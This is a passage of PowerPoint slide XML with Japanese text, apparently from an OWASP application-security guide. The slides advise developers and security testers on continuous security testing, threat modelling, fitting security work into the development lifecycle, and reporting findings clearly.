                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>アプリケーションセキュリティ教育</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5"/>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+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>開発者のための次のステップ</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19252D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142434" y="3259807"/>
            <a:ext cx="1034404" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="700" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>アプリケーション</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="700" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="700" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>セキュリティ要件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="1" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="6512432"/>
            <a:ext cx="1073874" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:rPr>
              <a:t>セキュアな開発</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:rPr>
              <a:t>ライフサイクル</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:latin typeface="Meiryo" charset="-128"/>
              <a:ea typeface="Meiryo" charset="-128"/>
              <a:cs typeface="Meiryo" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3763143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2692527041"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="899076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559">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>継続的なアプリケーションセキュリティテストを確立する</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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41">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ja-JP" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>セキュアにコードを実装することは重要です。しかし、構築しようとしているセキュリティがあり、それが正しく実装され、あらゆる箇所に適用されていることを確認することも重要です。アプリケーションセキュリティテストの目的は、セキュアな実装がなされていることの証跡を得ることです。アプリケーションセキュリティテストは難しく、複雑であり、アジャイルや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>DevOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>のような最新の高速な開発プロセスにおいては、従来のアプローチやツールでは立ち行かなくなっています。そのため、アプリケーションポートフォリオの全体において、重要と考えられることにどのように焦点をあて、費用対効果の高い手法をとるべきかを考慮することを強く推奨します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface=""/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>昨今、リスクは急速に変化を遂げており、毎年</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>回程度、脆弱性スキャンや侵入テストが行われています。また昨今のソフトウェア開発においては、ソフトウェア開発ライフサイクル全体での</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>継続的な</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface=""/>
                        </a:rPr>
                        <a:t>アプリケーションセキュリティテストが要求されています。開発スピードを損なうことのないようセキュリティの自動化を施し、既存の開発プロセスを強化してください。どのアプローチを選択したとしても、アプリケーションポートフォリオの規模に応じたテスト、トリアージ、修復、再テスト、再デプロイに係る年間コストを考慮してください。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface=""/>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+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>セキュリティテスト担当者のための</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>次のステップ</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-876300" y="3152800"/>
            <a:ext cx="8670785" cy="5448300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="219293" y="3181215"/>
            <a:ext cx="6479598" cy="5299061"/>
            <a:chOff x="219293" y="3150429"/>
            <a:chExt cx="6479598" cy="4891441"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="3206921"/>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テストを開始する前に、何に対して時間を費やすべきか理解していることを確認してください。優先順位は脅威モデルに基づき決定できます。そのため、脅威モデルが検討されていない場合には、テストを実施する前に検討する必要があります。脅威モデルの検討にあたっては、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP ASVS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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と </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>OWASP Testing Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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を活用することを検討し、ツールベンダーに依存することなく、ビジネスにおいて重要視されることを決定してください。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="12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5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="3150429"/>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27680"/>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rPr>
                <a:t>アプリケーションセキュリティテストのアプローチは、ソフトウェア開発ライフサイクルにおける、人材、プロセス及び使用するツールに馴染みがある必要があります。余計なステップ、ゲート、レビューを強制することで、軋轢を生み、バイパスされ、失敗する可能性があります。セキュリティ情報を収集し、プロセスにフィードバックする機会を探しましょう。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="9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9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="4171188"/>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52792"/>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各要件を検証するための最も簡単で、高速、かつ、正確な方法を選択してください。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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と</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP Application Security Verification Standard</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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を単体・総合テストにおける機能及び非機能のセキュリティ要件を策定する際に参照できます。自動化したツールを利用したことによる</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>false-positive</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に対処することに加え、重大な</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>false-negative</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に対処するための人的リソースの確保を考慮してください。</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3" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="5196300"/>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ja-JP" altLang="en-US" sz="1050" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>テスト戦略</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="105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4" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="6261855"/>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rPr>
                <a:t>すべてをテストする必要はありません。まずは重要なことに焦点をあて、段階的に検証プログラムの範囲を拡張していきます。つまり、自動的に検証されている一連のセキュリティ実装とリスクの範囲を拡張し、適用される一連のアプリケーションと</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>の範囲を拡張していくことを意図しています。すべてのアプリケーションと</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>が本質的にセキュアであることを継続的に検証される状態とすることを目的にしています。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5" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="225522" y="6205362"/>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ja-JP" altLang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>範囲と正確さの達成</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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6" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="7234362"/>
              <a:ext cx="5549303" cy="787569"/>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rPr>
                <a:t>どんなに良いテストを行ったとしても、それを効果的に伝えなければ何の違いもありません。アプリケーションの仕組みを理解していることを示すことにより、信頼を築きましょう。専門用語を羅列せず明確に記述し、実際に悪用する際の攻撃シナリオを含めましょう。脆弱性がどの程度悪用され得るか、どの程度の被害を受けるのかを現実的に評価してください。最後に、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>PDF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>ファイルではなく、開発チームがすでに使用しているツールで結果を提供しましょう。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="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17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="7214424"/>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mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214008" y="3387238"/>
            <a:ext cx="935580" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>脅威モデルの理解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198165" y="4366736"/>
            <a:ext cx="935580" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SDLC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>（ソフトウェア開発ライフサイクル）の理解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4155ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125324" y="7832021"/>
            <a:ext cx="1151765" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>明確な結果の</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
